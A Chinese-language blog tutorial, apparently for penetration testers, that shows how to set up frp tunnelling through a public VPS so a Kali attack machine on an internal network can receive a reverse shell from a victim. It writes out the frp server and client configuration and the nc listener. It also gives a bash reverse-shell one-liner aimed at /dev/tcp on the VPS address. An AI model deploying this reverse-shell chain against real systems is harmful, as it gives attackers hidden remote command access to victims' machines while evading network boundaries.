利用frp内网穿透实现反弹shell

前言:

很多时候kali都是处于我们内网的情况下,同时我们也知道,如果我们要进行反弹shell的话是一定要知道公网ip的,那么如何使得受害主机能正常反弹shell,同时我们的kali可以接受到信息呢

正文:

frp是一款非常流行的内网穿透工具,我们这里就要利用frp来进行内网穿透。

首先我们确定一下我们需要做什么

我们需要一台公网ip的服务器来当作我们的frp服务器

kali 我们的攻击机 处于内网环境中

https://github.com/fatedier/frp

首先我们去frp的github链接分别下载到我们的公网vps上和我们的kali上

首先来搭建我们的frp服务器,过程也非常简单:

首先将压缩包进行一个压缩

tar -zxvf frp_0.33.0_linux_amd64.tar.gz

解压之后的文件夹内容如下

image-20200527122231040

可以看到里面有两个一个是frpc 一个是frps

frpc 就代表着 frp client

frps 就代表着 frp server

我们先搭建我们的服务器,所以也就是frps

vim frps.ini

内容就是

[common]
bind_port=7000

我们不需要进行修改,这里代表的就是我们运行frp这个服务的端口是7000

然后我们运行命令

./frps -c ./frps.ini

运行我们的frp服务

image-20200527122636041

接下来配置我们的frp客户端

image-20200527122752403

第一个红框是我们之前搭建的frp服务器的 ip

第二个就是我们kali的ip

local_port 就是我们kali后面监听的端口

Remote_port = 1234 就是我们frp服务器上的端口

运行本地客户端

./frpc -c ./frpc.ini

image-20200527123031658

我们在反弹shell的过程中地址是 公网ip

bash -i >& /dev/tcp/134.175.xxx.xxx/1234 0>&1

我们的frp服务器的1234 接受到我们的请求之后 会根据配置文件转发到我们kali的4444端口上

然后kali本地监听 4444 端口

这样反弹shell就可以成功了

image-20200527123149080

然后kali上监听 nc -lvvp 4444

image-20200527123240512

成功执行命令

image-20200527123330630

然后我们的frp服务器上也显示了对应的日志

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇